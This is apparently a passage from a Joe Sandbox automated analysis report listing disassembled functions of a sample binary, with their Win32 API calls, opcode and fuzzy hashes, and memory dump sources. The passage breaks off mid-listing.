                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1101466143-0
                                                                                                                    • Opcode ID: 599075e71fbabc4bb062b3c8eba78646d8ea9e8182bf43f64803798d9966d9ab
                                                                                                                    • Instruction ID: bf15a8c7717157c0781931cc50e65e0d72c064a8e2a46e5da2e81008c534615b
                                                                                                                    • Opcode Fuzzy Hash: 599075e71fbabc4bb062b3c8eba78646d8ea9e8182bf43f64803798d9966d9ab
                                                                                                                    • Instruction Fuzzy Hash: 16516AB5A00209EFCB25CF58C890AAAB7B8FF4C314F158569E959DB341E735E911CFA0
                                                                                                                    Function 0031220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312258
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003122A3
                                                                                                                    • IsMenu.USER32(00000000), ref: 003122C3
                                                                                                                    • CreatePopupMenu.USER32 ref: 003122F7
                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00312355
                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00312386
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3311875123-0
                                                                                                                    • Opcode ID: c9c9b1e1c0b764c1fd6e0ee007fb0dbafacc1115e3912d614167ab6082301f6a
                                                                                                                    • Instruction ID: ee4c86e533e2e8f865503c9158e533be5c73c1889b0d54463c8f865eb84a35c5
                                                                                                                    • Opcode Fuzzy Hash: c9c9b1e1c0b764c1fd6e0ee007fb0dbafacc1115e3912d614167ab6082301f6a
                                                                                                                    • Instruction Fuzzy Hash: 5351C434900209DFDF2ACF64C888BDFBBF5BF49314F154929E8619B290D37489A5CB51
                                                                                                                    Function 002B1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 002B179A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002B17FE
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002B181B
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002B182C
                                                                                                                    • EndPaint.USER32(?,?), ref: 002B1876
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1827037458-0
                                                                                                                    • Opcode ID: c0ceb75ca7bdf245ba268ef9c58a5d5745649695c5a7e27b7af780a0fe7925c1
                                                                                                                    • Instruction ID: b16d4e5faa9074fd8d25adaaf5dc8893be0a3bfe8ec6a8b3006dabc9a8e4295c
                                                                                                                    • Opcode Fuzzy Hash: c0ceb75ca7bdf245ba268ef9c58a5d5745649695c5a7e27b7af780a0fe7925c1
                                                                                                                    • Instruction Fuzzy Hash: 2041BF30510701AFD722DF25CC94FA67BE8FB45360F544629FAA8872A1C7709865DB62
                                                                                                                    Function 0033B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(003757B0,00000000,00F75548,?,?,003757B0,?,0033B5A8,?,?), ref: 0033B712
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0033B736
                                                                                                                    • ShowWindow.USER32(003757B0,00000000,00F75548,?,?,003757B0,?,0033B5A8,?,?), ref: 0033B796
                                                                                                                    • ShowWindow.USER32(00000000,00000004,?,0033B5A8,?,?), ref: 0033B7A8
                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0033B7CC
                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0033B7EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642888154-0
                                                                                                                    • Opcode ID: a2dd8a72d8f8e8fa2551d90590f0e0204eeab4b6b6b6e5901ab8a9e1b5b82cc7
                                                                                                                    • Instruction ID: 4c85ce32c290383d31908b5be77048c5d8e6b01ea9b0f37593b8f6026b40f1fc
                                                                                                                    • Opcode Fuzzy Hash: a2dd8a72d8f8e8fa2551d90590f0e0204eeab4b6b6b6e5901ab8a9e1b5b82cc7
                                                                                                                    • Instruction Fuzzy Hash: E6416234600244AFDB27CF24C4DAB94BBE1FF45350F1941B9FA488F6A2C731A856CBA1
                                                                                                                    Function 0032709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00324E41,?,?,00000000,00000001), ref: 003270AC
                                                                                                                      • Part of subcall function 003239A0: GetWindowRect.USER32(?,?), ref: 003239B3
                                                                                                                    • GetDesktopWindow.USER32 ref: 003270D6
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003270DD
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0032710F
                                                                                                                      • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
                                                                                                                    • GetCursorPos.USER32(?), ref: 0032713B
                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00327199
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4137160315-0
                                                                                                                    • Opcode ID: 127afc86e9e6e2840184a080b9c6297e25512d98f5ac451d716a3b0296a249a5
                                                                                                                    • Instruction ID: ef3e08d8ce44b6132ad5fb608e1b174fefa3a909f9cfc79e75e60f4db6f12920
                                                                                                                    • Opcode Fuzzy Hash: 127afc86e9e6e2840184a080b9c6297e25512d98f5ac451d716a3b0296a249a5
                                                                                                                    • Instruction Fuzzy Hash: 3331FE32509315AFD721DF14D849F9BBBAAFF88304F00092AF48897191CB30EA19CB92
                                                                                                                    Function 00308879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003080A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003080C0
                                                                                                                      • Part of subcall function 003080A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003080CA
                                                                                                                      • Part of subcall function 003080A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003080D9
                                                                                                                      • Part of subcall function 003080A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003080E0
                                                                                                                      • Part of subcall function 003080A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003080F6
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0030842F), ref: 003088CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003088D6
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 003088DD
                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 003088F6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,0030842F), ref: 0030890A
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00308911
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3008561057-0
                                                                                                                    • Opcode ID: 8a8219d5bf88a2b0bd0d51adf532c55a89e900df30689db30ddcf9ae90717ae0
                                                                                                                    • Instruction ID: 03507fa1f2064fdc6e57f5adff74d034ec2a485f881a0d6e8065c3fc3adba049
                                                                                                                    • Opcode Fuzzy Hash: 8a8219d5bf88a2b0bd0d51adf532c55a89e900df30689db30ddcf9ae90717ae0
                                                                                                                    • Instruction Fuzzy Hash: 1811AC71A02209FFDB16AFA4DC5ABBE7BACEB44311F508028F885D7250CB329944DB60
                                                                                                                    Function 003085B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003085E2
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 003085E9
                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003085F8
                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00308603
                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00308632
                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00308646
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    • Opcode ID: c76fd024ea6d3a436820d487b41d15b42b258a771981f5c46ba17bb8db54188d
                                                                                                                    • Instruction ID: 8ac137e33515c601986b8ba85fcb26e8daf6b71eb62d6ab76cd87b537e018681
                                                                                                                    • Opcode Fuzzy Hash: c76fd024ea6d3a436820d487b41d15b42b258a771981f5c46ba17bb8db54188d
                                                                                                                    • Instruction Fuzzy Hash: D111597250120DAFDF128FA8DD89BEE7BADEF09344F054065FE44A21A0C7728D64EB60
                                                                                                                    Function 0030B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0030B7B5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0030B7C6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0030B7CD
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0030B7D5
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0030B7EC
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0030B7FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 3f51456fc46096ec9bf733c6aa0f60a46f60dc3ddff0ba51031fc248c8c3454c
                                                                                                                    • Instruction ID: ec3876e4b73005546366d63d597047593f19e4de47bbd477963212def86e14bf
                                                                                                                    • Opcode Fuzzy Hash: 3f51456fc46096ec9bf733c6aa0f60a46f60dc3ddff0ba51031fc248c8c3454c
                                                                                                                    • Instruction Fuzzy Hash: 9F018475E00209BFEB119BA69D85E5EBFBCEF48711F004075FA04A7291D6719C00CF90
                                                                                                                    Function 002D0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002D0193
                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 002D019B
                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002D01A6
                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002D01B1
                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 002D01B9
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002D01C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: 71ede40d3df374af9632c971876e33cea99e41ef687498bcae6d8ec68f9f67b3
                                                                                                                    • Instruction ID: a6315eb8864654b35de577ebfd4ce20ca1448c971b63b7f90a6177bc75d01760
                                                                                                                    • Opcode Fuzzy Hash: 71ede40d3df374af9632c971876e33cea99e41ef687498bcae6d8ec68f9f67b3
                                                                                                                    • Instruction Fuzzy Hash: 8A0148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
                                                                                                                    Function 003153E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003153F9
                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0031540F
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0031541E
                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0031542D
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00315437
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0031543E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    • Opcode ID: 2162838fd56d738ff6bc1fc89d2829a3ddc8993638a5e55c84c4919b2baebca9
                                                                                                                    • Instruction ID: 8488dd4fd495fae070652d9df58ca1be8e0f37f3a7ebc04857335383a4898967
                                                                                                                    • Opcode Fuzzy Hash: 2162838fd56d738ff6bc1fc89d2829a3ddc8993638a5e55c84c4919b2baebca9
                                                                                                                    • Instruction Fuzzy Hash: 65F09631940558BFD3225B52DC4EEEF7B7CEFC6B11F400169F904D1060D7A01A0186B5
                                                                                                                    Function 00317230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00317243
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,002C0EE4,?,?), ref: 00317254
                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,002C0EE4,?,?), ref: 00317261
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,002C0EE4,?,?), ref: 0031726E
                                                                                                                      • Part of subcall function 00316C35: CloseHandle.KERNEL32(00000000,?,0031727B,?,002C0EE4,?,?), ref: 00316C3F
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00317281
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,002C0EE4,?,?), ref: 00317288
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: 26c472608a67323ba9ee69e9f2c1a6e28428d08fa4b5c581e68aa438cf71009b
                                                                                                                    • Instruction ID: 7f157b945470f04437542dfe659ebb47045fd9f8586ae9a5dc7a4f8d6c615270
                                                                                                                    • Opcode Fuzzy Hash: 26c472608a67323ba9ee69e9f2c1a6e28428d08fa4b5c581e68aa438cf71009b
                                                                                                                    • Instruction Fuzzy Hash: 13F09A3A840202EFD7131B64ED8CDDB373DEF48302F800931F602D00A1CBB61842CA50
                                                                                                                    Function 00308992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0030899D
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 003089A9
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003089B2
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003089BA
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003089C3
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003089CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: 57ca2ac9fa2cf63637b8139592393aea698cc7e96c4e0038c3c4dcb05c82f609
                                                                                                                    • Instruction ID: c881b7eed59e2d95f9cb6393191d559dd9550973c73a9a5c35fc527288f19e93
                                                                                                                    • Opcode Fuzzy Hash: 57ca2ac9fa2cf63637b8139592393aea698cc7e96c4e0038c3c4dcb05c82f609
                                                                                                                    • Instruction Fuzzy Hash: DCE0C236804001FFDA021FE2EC4CD1ABB6DFB89362F908230F21981070CB329424DB50
                                                                                                                    Function 00307530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00342C7C,?), ref: 003076EA
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00342C7C,?), ref: 00307702
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0033FB80,000000FF,?,00000000,00000800,00000000,?,00342C7C,?), ref: 00307727
                                                                                                                    • _memcmp.LIBCMT ref: 00307748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                    • String ID: ,,4
                                                                                                                    • API String ID: 314563124-3600021901
                                                                                                                    • Opcode ID: e64c7c74fa7a92f149eaf9e2ffb180d047be191a8952bfd8f2e60bb3d737469d
                                                                                                                    • Instruction ID: 7b79845c9d4860f6258e2ad25e7eebdc3fa2aced6ab32a7e83bbd73dbb2d5b0b
                                                                                                                    • Opcode Fuzzy Hash: e64c7c74fa7a92f149eaf9e2ffb180d047be191a8952bfd8f2e60bb3d737469d
                                                                                                                    • Instruction Fuzzy Hash: 53813B75E00109EFCB05DFA4C994EEEB7B9FF89315F204158E506AB290DB71AE06CB60
                                                                                                                    Function 003285ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00328613
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00328722
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0032889A
                                                                                                                      • Part of subcall function 00317562: VariantInit.OLEAUT32(00000000), ref: 003175A2
                                                                                                                      • Part of subcall function 00317562: VariantCopy.OLEAUT32(00000000,?), ref: 003175AB
